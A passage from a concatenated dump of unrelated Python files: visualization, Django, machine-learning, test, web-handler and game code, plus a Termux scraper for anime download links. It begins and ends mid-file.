np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32) outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32) if self.variable_vis: # "box_to_face" and "box_to_outl" represent array of faces and # outlines indexes associated to each box box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32) box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32) scale = np.array([width, height, depth]) # Iterate for every marker for i in range(point_coords.shape[0]): idx_v_start = self.nb_v*i idx_v_end = self.nb_v*(i+1) idx_fi_start = self.nb_fi*i idx_fi_end = self.nb_fi*(i+1) idx_oi_start = self.nb_oi*i idx_oi_end = self.nb_oi*(i+1) # Scale and translate unit box vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i] filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start if self.variable_vis: box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end) box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end) if self.variable_vis: self.box_to_face = box_to_face self.box_to_outl = box_to_outl self._visible_boxes = np.arange(self.nb_points) # Create MeshVisual for faces and borders self.mesh.set_data(vertices['position'], filled_indices, vertex_colors, face_colors, color) self.border.set_data(vertices['position'], outline_indices, color=edge_color) @property def variable_vis(self): """Bool if instance of BoxMarkersVisual posseses variable visibility. """ return self._variable_vis @variable_vis.setter def variable_vis(self, variable_vis): raise ValueError('Not allowed to change "variable_vis" after initialization.') @property def visible_boxes(self): """Array of indexes of boxes that are currently visible. """ if not self.variable_vis: raise ValueError('Variable visibility must be enabled via "variable_vis".') return self._visible_boxes @visible_boxes.setter def visible_boxes(self, visible_boxes): if not self.variable_vis: raise ValueError('Variable visibility must be enabled via "variable_vis".') self._visible_boxes = visible_boxes @property def mesh(self): """The vispy.visuals.MeshVisual that used to fill in. """ return self._mesh @mesh.setter def mesh(self, mesh): self._mesh = mesh @property def border(self): """The vispy.visuals.MeshVisual that used to draw the border. """ return self._border @border.setter def border(self, border): self._border = border BoxMarkers = create_visual_node(BoxMarkersVisual)
# Generated by Django 3.0 on 2021-03-07 20:15 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('lms_app', '0004_auto_20210228_2000'), ] operations = [ migrations.AddField( model_name='video', name='vimeo_video', field=models.CharField(blank=True, max_length=200, null=True), ), ]
#!/usr/bin/python import Queue import subprocess import os import datetime import argparse import shutil import multiprocessing from celery import Celery from gridmaster import submit from gridmaster import getwork from gridmaster import donework def main(): parser = argparse.ArgumentParser() parser.add_argument("filename", help='file containing newline-separated jobs', type = str) args = parser.parse_args() with open(args.filename, 'r') as fh: for line in fh: if line[0] != '#': submit.delay(job_command) if __name__ == "__main__": main()
from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from scipy import stats from sklearn import base, cross_validation from sklearn.externals import joblib from .sofia_ml import svm_train, learner_type, loop_type, eta_type class RankSVM(base.BaseEstimator): """ RankSVM model using stochastic gradient descent. TODO: does this fit intercept ? Parameters ---------- alpha : float model : str, default='rank' max_iter : int, default=1000 Number of stochastic gradient steps to take """ def __init__(self, alpha=1., model='rank', max_iter=1000): self.alpha = alpha self.max_iter = max_iter self.model = model def fit(self, X, y, query_id=None): n_samples, n_features = X.shape self.coef_ = svm_train(X, y, query_id, self.alpha, n_samples, n_features, learner_type.sgd_svm, loop_type.rank, eta_type.basic_eta, max_iter=self.max_iter) return self def rank(self, X): order = np.argsort(X.dot(self.coef_)) order_inv = np.zeros_like(order) order_inv[order] = np.arange(len(order)) return order_inv # just so that GridSearchCV doesn't complain predict = rank def score(self, X, y): tau, _ = stats.kendalltau(X.dot(self.coef_), y) return np.abs(tau) def _inner_fit(X, y, query_id, train, test, alpha): # aux method for joblib clf = RankSVM(alpha=alpha) if query_id is None: clf.fit(X[train], y[train]) else: clf.fit(X[train], y[train], query_id[train]) return clf.score(X[test], y[test]) class RankSVMCV(base.BaseEstimator): """ Cross-validated RankSVM the cross-validation generator will be ShuffleSplit """ def __init__(self, alphas=np.logspace(-1, 4, 5), cv=5, n_jobs=1, model='rank', max_iter=1000): self.alphas = alphas self.max_iter = max_iter self.model = model self.cv = cv self.n_jobs = n_jobs def fit(self, X, y, query_id=None): if hasattr(self.cv, '__iter__'): cv = self.cv else: cv = cross_validation.ShuffleSplit(len(y), n_iter=self.cv) mean_scores = [] if query_id is not None: query_id = np.array(query_id) if not len(query_id) == len(y): raise ValueError('query_id of wrong shape') for a in self.alphas: scores = joblib.Parallel(n_jobs=self.n_jobs)( joblib.delayed(_inner_fit) (X, y, query_id, train, test, a) for train, test in cv) mean_scores.append(np.mean(scores)) self.best_alpha_ = self.alphas[np.argmax(mean_scores)] self.estimator_ = RankSVM(self.best_alpha_) self.estimator_.fit(X, y, query_id) self.rank = self.estimator_.rank def score(self, X, y): return self.estimator_.score(X, y) def predict(self, X): return self.estimator_.predict(X)
# Importing the Libraries import tensorflow as tf import nni # loading the MNIST dataset & performing the Normalization def load_dataset(): (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data() return (x_train/255., y_train), (x_test/255., y_test) # Creating the Sequential Model def create_model(num_units, dropout_rate, lr, activation): model = tf.keras.models.Sequential([ tf.keras.layers.Flatten(), tf.keras.layers.Dense(num_units, activation=activation), tf.keras.layers.Dropout(dropout_rate), tf.keras.layers.Dense(10, activation="softmax") ]) model.compile( loss="sparse_categorical_crossentropy", optimizer=tf.keras.optimizers.Adam(lr=lr), metrics=["accuracy"] ) return model # Defining the callbacks class ReportIntermediates(tf.keras.callbacks.Callback): def on_epoch_end(self, epoch, logs=None): acc = logs.get("val_accuracy") or 0. nni.report_intermediate_result(acc) def main(params): num_units = params.get("num_units") dropout_rate = params.get("dropout_rate") lr = params.get("lr") batch_size = params.get("batch_size") activation = params.get("activation") model = create_model(num_units, dropout_rate, lr, activation) (x_train, y_train), (x_test, y_test) = load_dataset() _ = model.fit( x_train, y_train, validation_data=(x_test, y_test), epochs=10, verbose=False, batch_size=batch_size, callbacks=[ReportIntermediates()] ) _, acc = model.evaluate(x_test, y_test, verbose=False) nni.report_final_result(acc) if __name__ == "__main__": params = { "num_units": 32, "dropout_rate": 0.1, "lr": 0.0001, "batch_size": 32, "activation": "relu" } tuned_params = nni.get_next_parameter() params.update(tuned_params) main(params)
""" test get/set & misc """ import pandas as pd from pandas import MultiIndex, Series def test_access_none_value_in_multiindex(): # GH34318: test that you can access a None value using .loc through a Multiindex s = Series([None], pd.MultiIndex.from_arrays([["Level1"], ["Level2"]])) result = s.loc[("Level1", "Level2")] assert result is None midx = MultiIndex.from_product([["Level1"], ["Level2_a", "Level2_b"]]) s = Series([None] * len(midx), dtype=object, index=midx) result = s.loc[("Level1", "Level2_a")] assert result is None s = Series([1] * len(midx), dtype=object, index=midx) result = s.loc[("Level1", "Level2_a")] assert result == 1
import base64 import gzip from starlette.requests import Request from starlette.responses import JSONResponse, Response from yarl import URL def _generate_download_link(base_url: URL, code: str) -> URL: return base_url.with_query(gzip=base64.urlsafe_b64encode(gzip.compress(code.encode())).decode()) async def generate_download_link_handler(request: Request) -> Response: print(request.base_url) print(request.headers) try: json_data = await request.json() except ValueError: return Response(status_code=400) if ( not isinstance(json_data, dict) or json_data.keys() != {"code", "base_url"} or not isinstance(json_data["base_url"], str) or not isinstance(json_data["code"], str) ): return Response(status_code=400) try: base_url = URL(json_data["base_url"]) except ValueError: return Response(status_code=400) code = json_data["code"] download_link = _generate_download_link(URL(base_url), code) return JSONResponse({ "download_link": str(download_link), })
import copy import random import sys # ------------------------------------------------------------------ def aux_print (elem): if elem == 0: return " . " if elem == 1: return " X " if elem == -1: return " O " def mostra_tabuleiro(T): for x in range (0,(9)): if (x == 3 or x == 6): print ("\n") print (aux_print (T[x]), end = ""), print ("\n") # ------------------------------------------------------------------ # devolve a lista de ações que se podem executar partido de um estado def acoes(T): lista=[] for i in range (0,(9)): if T[i]==0: lista.append(i) return lista # ------------------------------------------------------------------ # devolve o estado que resulta de partir de um estado e executar uma ação def resultado(T,a,jog): aux = copy.copy(T) if aux[a]==0: if jog == 'MAX': aux[a]=1 else: aux[a]=-1 return aux # ------------------------------------------------------------------ # existem 8 possíveis alinhamentos vencedores, para cada jogador def utilidade(T): # testa as linhas for i in (0,3,6): if (T[i] == T[i+1] == T[i+2]): if (T[i] == 1): return 1 elif (T[i] == -1): return -1 #testa colunas for i in (0,1,2): if (T[i] == T[i+3] == T[i+6]): if (T[i] == 1): return 1 elif (T[i] == -1): return -1 #testa diagonais if (T[0] == T[4] == T[8]): if (T[0] == 1): return 1 elif (T[0] == -1): return -1 if (T[2] == T[4] == T[6]): if (T[2] == 1): return 1 elif (T[2] == -1): return -1 # não é nodo folha ou dá empate return 0 # ------------------------------------------------------------------ # devolve True se T é terminal, senão devolve False def estado_terminal(T): x = utilidade(T) if (x == 0): for x in range (0,9): if (T[x] == 0): return (False) return (True) # ------------------------------------------------------------------ # algoritmo da wikipedia # https://en.wikipedia.org/wiki/Alpha%E2%80%93beta_pruning # ignoramos a profundidade e devolvemos o valor, a ação e o estado resultante def alfabeta(T,alfa,beta,jog): if estado_terminal(T): return utilidade(T),-1,-1 if jog: v = -10 ba=-1 for a in acoes(T): v1,ac,es = alfabeta(resultado(T,a,'MAX'),alfa,beta,False) if v1 > v: # guardo a ação que corresponde ao melhor v = v1 ba=a alfa = max(alfa,v) if beta <= alfa: break return v,ba,resultado(T,ba,'MAX') else: # COMPLETAR v = 10 ba= -1 for a in acoes(T): v1,ac,es = alfabeta(resultado(T,a,'MIN'),alfa,beta,True) if v1 < v: # guardo a ação que corresponde ao melhor v = v1 ba=a alfa = min(alfa,v) if beta <= alfa : break return v,ba,resultado(T,ba,'MIN') # ------------------------------------------------------------------ def joga_max(T): v,a,e = alfabeta(T,-10,10,True) print ('MAX joga para '),a return e # ------------------------------------------------------------------ def joga_min(T): v,a,e = alfabeta(T,-10,10,False) print ('MIN joga para '),a return e # ------------------------------------------------------------------ def jogo(p1,p2): # cria tabuleiro vazio T = [0,0,0,0,0,0,0,0,0] mostra_tabuleiro(T) while acoes(T) != [] and not estado_terminal(T): T=p1(T) mostra_tabuleiro(T) if acoes(T) != [] and not estado_terminal(T): T=p2(T) mostra_tabuleiro(T) # fim if utilidade(T) == 1: print ('Venceu o jogador 1') elif utilidade(T) == -1: print ('Venceu o jogador 2') else: print ('Empate') # ------------------------------------------------------------------ # jogador aleatório def joga_rand(T): x = random.randint(0,8) i = True while i: if (T[x] == 0): T=resultado(T,x,'MIN') i = False else: x = random.randint(0,8) print ('RAND joga para '),x return T # ------------------------------------------------------------------ #---------Jogador humano def joga_utilizador(T): print ("Introduza a posicao para que quer jogar:") posicao = int(input("—> ")) disponiveis = acoes(T) while posicao not in disponiveis: posicao = int(input("—> ")) T = resultado(T, posicao, 'MIN') print ('USER joga para '), posicao return T # main # deve ganhar sempre o max: #jogo(joga_max,joga_rand) # devem empatar sempre: #jogo(joga_max,joga_min) # jogador humano vs ZI MACHINE jogo(joga_max, joga_utilizador)
#!/usr/bin/python # -*- coding:UTF-8 -*- if __name__ == '__main__': l1 = [3, [66, 55, 44], (7, 8, 9)] l2 = list(l1) l1.append(100) l1[1].remove(55) print('l1:', l1) print('l2:', l2) l2[1] += [33, 22] l2[2] += (10, 11) # +=对雨元组来说,相当于创建了一个新的元组。 print('l1:', l1) print('l2:', l2)
import json import unittest from libsaas import port from libsaas.executors import test_executor from libsaas.services import googlecalendar from libsaas.services.base import MethodNotSupported class GoogleCalendarTestCase(unittest.TestCase): def setUp(self): self.executor = test_executor.use() self.executor.set_response(b'{}', 200, {}) self.service = googlecalendar.GoogleCalendar(access_token='my-access-token') def expect(self, method=None, uri=None, params={}, headers=None): if method: self.assertEqual(method, self.executor.request.method) if uri: self.assertEqual(self.executor.request.uri, 'https://www.googleapis.com/calendar/v3' + uri) self.assertEqual(self.executor.request.params, params) if headers: self.assertEqual(self.executor.request.headers, headers) def test_user(self): with port.assertRaises(MethodNotSupported): self.service.me().get() with port.assertRaises(MethodNotSupported): self.service.me().create() with port.assertRaises(MethodNotSupported): self.service.me().update() with port.assertRaises(MethodNotSupported): self.service.me().patch() with port.assertRaises(MethodNotSupported): self.service.me().delete() with port.assertRaises(MethodNotSupported): self.service.me().settings().create() with port.assertRaises(MethodNotSupported): self.service.me().settings().update() with port.assertRaises(MethodNotSupported): self.service.me().settings().patch() with port.assertRaises(MethodNotSupported): self.service.me().settings().delete() self.service.me().settings().get() self.expect('GET', '/users/me/settings', {}) with port.assertRaises(MethodNotSupported): self.service.me().setting('1234').create() with port.assertRaises(MethodNotSupported): self.service.me().setting('1234').update() with port.assertRaises(MethodNotSupported): self.service.me().setting('1234').patch() with port.assertRaises(MethodNotSupported): self.service.me().setting('1234').delete() self.service.me().setting('1234').get() self.expect('GET', '/users/me/settings/1234', {}) with port.assertRaises(MethodNotSupported): self.service.me().calendar_lists().update() with port.assertRaises(MethodNotSupported): self.service.me().calendar_lists().patch() with port.assertRaises(MethodNotSupported): self.service.me().calendar_lists().delete() with port.assertRaises(MethodNotSupported): self.service.me().calendar_list('1234').create() self.service.me().calendar_lists().get() self.expect('GET', '/users/me/calendarList', {}) obj = {'foo': 'bar'} self.service.me().calendar_lists().create(obj) self.expect('POST', '/users/me/calendarList', json.dumps(obj)) self.service.me().calendar_list('1234').get() self.expect('GET', '/users/me/calendarList/1234', {}) self.service.me().calendar_list('1234').update(obj) self.expect('PUT', '/users/me/calendarList/1234', json.dumps(obj)) self.service.me().calendar_list('1234').patch(obj) self.expect('PATCH', '/users/me/calendarList/1234', json.dumps(obj)) self.service.me().calendar_list('1234').delete() self.expect('DELETE', '/users/me/calendarList/1234', {}) def test_colors(self): with port.assertRaises(MethodNotSupported): self.service.colors().create() with port.assertRaises(MethodNotSupported): self.service.colors().update() with port.assertRaises(MethodNotSupported): self.service.colors().patch() with port.assertRaises(MethodNotSupported): self.service.colors().delete() self.service.colors().get() self.expect('GET', '/colors', {}) def test_freebusy(self): with port.assertRaises(MethodNotSupported): self.service.freebusy().get() with port.assertRaises(MethodNotSupported): self.service.freebusy().create() with port.assertRaises(MethodNotSupported): self.service.freebusy().update() with port.assertRaises(MethodNotSupported): self.service.freebusy().patch() with port.assertRaises(MethodNotSupported): self.service.freebusy().delete() obj = {'foo': 'bar'} self.service.freebusy().query(obj) self.expect('POST', '/freeBusy', json.dumps(obj)) def test_calendar(self): with port.assertRaises(MethodNotSupported): self.service.calendars().get() with port.assertRaises(MethodNotSupported): self.service.calendars().update() with port.assertRaises(MethodNotSupported): self.service.calendars().patch() with port.assertRaises(MethodNotSupported): self.service.calendars().delete() obj = {'foo': 'bar'} self.service.calendars().create(obj) self.expect('POST', '/calendars', json.dumps(obj)) with port.assertRaises(MethodNotSupported): self.service.calendar('1234').create() self.service.calendar('1234').get() self.expect('GET', '/calendars/1234', {}) self.service.calendar('1234').update(obj) self.expect('PUT', '/calendars/1234', json.dumps(obj)) self.service.calendar('1234').patch(obj) self.expect('PATCH', '/calendars/1234', json.dumps(obj)) self.service.calendar('1234').delete() self.expect('DELETE', '/calendars/1234', {}) self.service.calendar('1234').clear() self.expect('POST', '/calendars/1234/clear', {}) with port.assertRaises(MethodNotSupported): self.service.calendar('1234').rules().update() with port.assertRaises(MethodNotSupported): self.service.calendar('1234').rules().patch() with port.assertRaises(MethodNotSupported): self.service.calendar('1234').rules().delete() self.service.calendar('1234').rules().get() self.expect('GET', '/calendars/1234/acl', {}) obj = {'foo': 'bar'} self.service.calendar('1234').rules().create(obj) self.expect('POST', '/calendars/1234/acl', json.dumps(obj)) with port.assertRaises(MethodNotSupported): self.service.calendar('1234').rule('1234').create() self.service.calendar('1234').rule('1234').get() self.expect('GET', '/calendars/1234/acl/1234', {}) self.service.calendar('1234').rule('1234').update(obj) self.expect('PUT', '/calendars/1234/acl/1234', json.dumps(obj)) self.service.calendar('1234').rule('1234').patch(obj) self.expect('PATCH', '/calendars/1234/acl/1234', json.dumps(obj)) self.service.calendar('1234').rule('1234').delete() self.expect('DELETE', '/calendars/1234/acl/1234', {}) with port.assertRaises(MethodNotSupported): self.service.calendar('1234').events().update() with port.assertRaises(MethodNotSupported): self.service.calendar('1234').events().patch() with port.assertRaises(MethodNotSupported): self.service.calendar('1234').events().delete() self.service.calendar('1234').events().get() self.expect('GET', '/calendars/1234/events', {}) self.service.calendar('1234').events().get(timeZone='UTC') self.expect('GET', '/calendars/1234/events', {'timeZone': 'UTC'}) obj = {'foo': 'bar'} self.service.calendar('1234').events().create(obj) self.expect('POST', '/calendars/1234/events', json.dumps(obj)) self.service.calendar('1234').events().importing(obj) self.expect('POST', '/calendars/1234/events/import', json.dumps(obj)) self.service.calendar('1234').events().quick_add('text', True) self.expect('POST', '/calendars/1234/events/quickAdd?text=text&sendNotifications=true') with port.assertRaises(MethodNotSupported): self.service.calendar('1234').event('1234').create() self.service.calendar('1234').event('1234').get() self.expect('GET', '/calendars/1234/events/1234', {}) self.service.calendar('1234').event('1234').instances() self.expect('GET', '/calendars/1234/events/1234/instances', {}) self.service.calendar('1234').event('1234').instances(maxResults=1) self.expect('GET', '/calendars/1234/events/1234/instances', {'maxResults': 1}) self.service.calendar('1234').event('1234').update(obj) self.expect('PUT', '/calendars/1234/events/1234', json.dumps(obj)) self.service.calendar('1234').event('1234').update(obj, True) self.expect('PUT', '/calendars/1234/events/1234?alwaysIncludeEmail=true', json.dumps(obj)) self.service.calendar('1234').event('1234').patch(obj) self.expect('PATCH', '/calendars/1234/events/1234', json.dumps(obj)) self.service.calendar('1234').event('1234').patch(obj, sendNotifications=True) self.expect('PATCH', '/calendars/1234/events/1234?sendNotifications=true', json.dumps(obj)) self.service.calendar('1234').event('1234').delete() self.expect('DELETE', '/calendars/1234/events/1234', {}) self.service.calendar('1234').event('1234').delete(True) self.expect('DELETE', '/calendars/1234/events/1234?sendNotifications=true') self.service.calendar('1234').event('1234').move('1234') self.expect('POST', '/calendars/1234/events/1234/move?destination=1234')
#!/usr/bin/python # -*- coding: utf-8 -*- """The Controller class for Cities.""" import re from flask import Blueprint, render_template, redirect, url_for, current_app, \ request, abort, flash from modules.Countries.model import Country from modules.Regions.model import Region from modules.Cities.model import City from modules.Shared.database import db # collection of URLs for the cities section of the website # setup the controller, use a local folder for templates cities = Blueprint( 'cities', __name__, template_folder='templates', static_folder='static', url_prefix='/cities' ) @cities.route('/') def view_all_cities(): """ homepage with all cities in a table """ return render_template('cities/view_all.html', Cities=City) @cities.route('/view/<city_id>') def view_one_city(city_id): """ view a single city in detail """ entry = City.query.get(city_id) if not entry is None: return render_template('cities/view.html', entry=entry) else: flash('Entry does not exist.', 'error') return redirect(url_for('cities.view_all_cities')) @cities.route('/add', methods=['GET', 'POST']) def add_city(): """ add a city page function """ # init variables entry = City() # creates a model.py instance, instance only has a name right now error_msg = {} form_is_valid = True country_list = Country.query.all() region_list = Region.query.all() if request.method == 'GET': return render_template('cities/add.html', entry=entry, \ country_list=country_list, \ region_list=region_list, \ error_msg=error_msg) if request.method == 'POST': # validate input [entry, form_is_valid, error_msg] = form_validate_city(entry) # check if the form is valid if not form_is_valid: # current_app.logger.info('invalid add city') return render_template('cities/add.html', entry=entry, \ country_list=country_list, \ region_list=region_list, \ error_msg=error_msg) # the data is valid, save it db.session.add(entry) db.session.commit() return redirect(url_for('cities.view_one_city', \ city_id=entry.city_id)) # current_app.logger.error("unsupported method") @cities.route('/edit/<city_id>', methods=['GET', 'POST']) def edit_city(city_id): """ edit city details """ # init variables entry = City.query.get(city_id) error_msg = {} form_is_valid = True country_list = Country.query.all() region_list = Region.query.all() if request.method == 'GET': return render_template('cities/edit.html', \ entry=entry, error_msg=error_msg, \ country_list=country_list, \ region_list=region_list) if request.method == 'POST': # validate input [entry, form_is_valid, error_msg] = form_validate_city(entry) # check if the form is valid if not form_is_valid: # current_app.logger.info('invalid edit city: ' + str(entry)) return render_template('cities/edit.html', entry=entry, \ country_list=country_list, \ region_list=region_list, \ error_msg=error_msg) # the data is valid, save it db.session.commit() return redirect(url_for('cities.view_one_city', \ city_id=entry.city_id)) # current_app.logger.error("unsupported method") def form_validate_city(entry): """ validate City form data """ # validate data form_is_valid = True error_msg = {} # retrieve data from the global Request object data = request.form if not 'city_name' or not 'country_id' or not 'region_id' in data: if not 'city_name' in data: error_msg['city_name'] = "Please fill in the city name." if not 'country_id' in data: error_msg['country_id'] = "Please choose the country." if not 'region_id' in data: error_msg['region_id'] = "Please choose the region." form_is_valid = False return [entry, form_is_valid, error_msg] # get string, cast to ASCII, truncate to 128 chars, strip multi spaces entry.city_name = \ re.sub(' +', ' ', data['city_name'].encode('ascii', 'ignore')[:127]) # retrieve ids in the data var from the html form if data['country_id'].isdigit(): entry.country_id = int(data['country_id']) else: form_is_valid = False error_msg['country_id'] = "Please choose the country." if data['region_id'].isdigit(): entry.region_id = int(data['region_id']) else: form_is_valid = False error_msg['region_id'] = "Please choose the region." # ensure the city_name is filled in if not entry.city_name: form_is_valid = False error_msg['city_name'] = "Please fill in the city name." # city name underflow check, 2 or less characters if len(entry.city_name) < 3: form_is_valid = False error_msg['city_name'] = "Please fill in the city name completely." # ensure the city name is letters match = re.match('^[a-zA-Z ]*$', entry.city_name) if not match: form_is_valid = False error_msg['city_name'] = "Please fill in a city name only with English letters." # else: # current_app.logger.info("match = " + str(match.group(0))) # ensure country_id and region_id are chosen if not entry.country_id: form_is_valid = False error_msg['country_id'] = "Please choose the country." if not entry.region_id: form_is_valid = False error_msg['region_id'] = "Please choose the region." return [entry, form_is_valid, error_msg] @cities.route('/delete/<city_id>') def delete_city(city_id): """ delete a city """ entry = City.query.get(city_id) # check something doesnt exist if entry is None: return abort(400, 'Entry does not exist.') db.session.delete(entry) db.session.commit() return redirect(url_for('cities.view_all_cities'))
from __future__ import print_function, absolute_import from .image import ImageSoftmaxEngine, ImageTripletEngine,ImageHardTripletEngine from .video import VideoSoftmaxEngine, VideoTripletEngine from .engine import Engine
#!/data/data/com.termux/files/usr/bin/python # Update : (2020-09-03 23:04:09) # Finish : Now! # © Copyright 2020 | Ezz-Kun | kyun-kyunnn from bs4 import BeautifulSoup as bs_ from os import system as _Auth from string import ascii_letters as _ascii from time import sleep from random import randint import requests as req_ import sys b = '\033[1;34m' h = '\033[1;32m' p = '\033[1;37m' m = '\033[1;31m' class _print(object): def __init__(self,string): for i in string +'\n': sys.stdout.write(str(i)) sys.stdout.flush() sleep(0.00050) __banner__ = (f""" {b}╔═╗{p}┌─┐{b}╦ {p}┌─┐┬ ┬┌─┐┬─┐{b}╔═╗ ╦ ╦{p}┬─┐{b}╦ {b}║ ║{p}├─┘{b}║ {p}│ │└┐┌┘├┤ ├┬┘{b}╔═╝{p}───{b}║ ║{p}├┬┘{b}║ ╚═╝{p}┴ {b}╩═╝{p}└─┘ └┘ └─┘┴└─{b}╚═╝ ╚═╝{p}┴└─{b}╩═╝ ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈{b}≻ {b}[{h}≈{b}]{p} Author {b}:{p} Ezz-Kun {b}|{h} (´•ω•`๑) {b}[{h}≈{b}]{p} Tools {b}:{p} Oploverz {m}~{p} Url {b}[{h}≈{b}]{p} Versi {b}:{p} {randint(10,999)}.{randint(10,100)} Update{m} ! {h}► {b}[{p}Oploverz{b}]{h} ◄ """) class _OpLoverz(object): def __init__(self,url): if 'https://' not in url: self.url = (f"https://www.oploverz.in/?s={url.replace(' ','+')}&post_type=post") else: self.url = url self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"} self.judul = [] self.href_ = [] self.info = [] self.links = [] self.server = [] self.sorattl = [] self._GetInformation(self.url) def _GetInformation(self,url_): try: _shogi = req_.get(url_,headers=self.headers).text _bes = bs_(_shogi,'html.parser') _data = _bes.findAll('div',class_='dtl') next_ = _bes.find('a',class_='nextpostslink',rel='next') prev_ = _bes.find('a',class_='previouspostslink',rel='prev') if len(_data) != 0: for cek_ in _data: self.judul.append(cek_.find('a')["title"]) self.href_.append(cek_.find('a')["href"]) self.info.append(cek_.find('span').text) _Auth('clear') _print(__banner__) for yui, yui_ in enumerate(self.judul): _print(f' {b}[{p}{yui+1}{b}].{p}{yui_}') if next_ != None: _print(f""" {b}[{h}» {p}{_bes.find('span',class_='pages').text} {h}«{b}]{p} {b}[{p} Type {b}[{p}N{b}]{p} For Next Type {b}[{p}P{b}]{p} For Prev {b}]{p}""") _cos = input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} ') if _cos == '': exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is None !') elif str(_cos) in _ascii: if str(_cos).lower() == 'n': _OpLoverz(next_["href"]) elif str(_cos).lower() == 'p': if prev_ != None: _OpLoverz(prev_["href"]) else: exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Can Not Previous First Pages!') elif str(_cos) not in _ascii: if int(_cos)-1 < len(self.href_): # print(self.href_) self._downloadPages(self.href_[int(_cos)-1]) else: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Index!') else: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Invalid Choice!') else: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Title ``url`` Not Found In Oploverz') except req_.exceptions.ConnectionError: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!') except (EOFError,KeyboardInterrupt): exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}') def _downloadPages(self,_url): try: _shogi = req_.get(_url,headers=self.headers).text _bes = bs_(_shogi,'html.parser') sora_ttl = _bes.findAll('div',class_='sorattl title-download') sora_url = _bes.findAll('div',class_='soraurl list-download') list(self.sorattl.append(_.text.split(' – ')[-1]) for _ in sora_ttl) _Auth('clear') _print(__banner__) for ciu, ciu_ in enumerate(self.sorattl): _print(f' {b}[{p}{ciu+1}{b}].{p}{ciu_}') _sor = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} ')) if (_sor-1) < len(sora_url): for cek in sora_url[_sor-1].findAll('a'): self.server.append(cek.text) self.links.append(cek["href"]) for serv, serv_ in enumerate(self.server): _print(f' {b}[{p}{serv+1}{b}].{p}{serv_} {b}≽{p} {self.links[serv]}') _opz = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Open To Browser {b}≽{p} ')) if (_opz-1) < len(self.links): # print(self.links[_opz-1]) _Auth(f'termux-open {self.links[_opz-1]}') _OpLoverz(self.url) else: exit(' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}') else: exit(' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}') except req_.exceptions.ConnectionError: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!') except (EOFError,KeyboardInterrupt,ValueError): exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}') def _MainOpz(): _Auth('clear') _print(__banner__) print(f""" {b}[{p}01{b}].{p}Search Title {b}[{p}02{b}].{p}More Information {b}[{p}03{b}].{p}Exit""") try: _cus = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} ')) if _cus == '': exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is Nothing!') elif _cus == 1: _Auth('clear') _print(__banner__) jdl_ = input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title {b}≽{p} ') if jdl_ == '': exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title Is Nothing!') else: _OpLoverz(jdl_) elif _cus == 2: _print(f""" {m}▪{p} Gak Ada Yang Beda ,Cuman Fix Error Doang Gak Ada Function Auto Download Nya, Sengaja Lewat Open Browser Biar Bisa Ke UC Browser& Download Juga Jadi Wuzz.. Wuzz.. {m}▪{p} Yang Nama Nya Web Anime Ya Pasti Gak Ada Yang Lengkap, Kalau Anime Yang Di Cari Gak Ada Di Oploverz Bisa Pake Yg Neonime, Kalau Batch Bisa Pake Yg Kusonime {b}▪{p} Versi KusoNime {b}≽{p} https://github.com/Ezz-Kun/kusonime-url {b}▪{p} Versi NeoNime {b}≽{p} https://github.com/Ezz-Kun/neonime-url {h}▪{p} Contact Wa : 085325463021 """) input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Enter To Back!') _MainOpz() elif _cus == 3: exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Exit Tools{m}!') else: exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Invalid Choice!') except (ValueError,KeyboardInterrupt,EOFError): exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Something Error{m}!{p}') if __name__=="__main__": _MainOpz()
# This script has been designed to perform multi-objective learning of core sets # by Alberto Tonda and Pietro Barbiero, 2018 <alberto.tonda@gmail.com> <pietro.barbiero@studenti.polito.it> #basic libraries import argparse import copy import datetime import inspyred import matplotlib.pyplot as plt import numpy as np import random import os import sys import logging import time import tensorflow as tf # sklearn library from sklearn import datasets from sklearn.datasets.samples_generator import make_blobs, make_circles, make_moons from sklearn.preprocessing import StandardScaler from sklearn.metrics import accuracy_score from sklearn.ensemble import AdaBoostClassifier from sklearn.ensemble import BaggingClassifier from sklearn.ensemble import ExtraTreesClassifier from sklearn.ensemble import GradientBoostingClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.linear_model import ElasticNet from sklearn.linear_model import ElasticNetCV from sklearn.linear_model import Lasso from sklearn.linear_model import LassoCV from 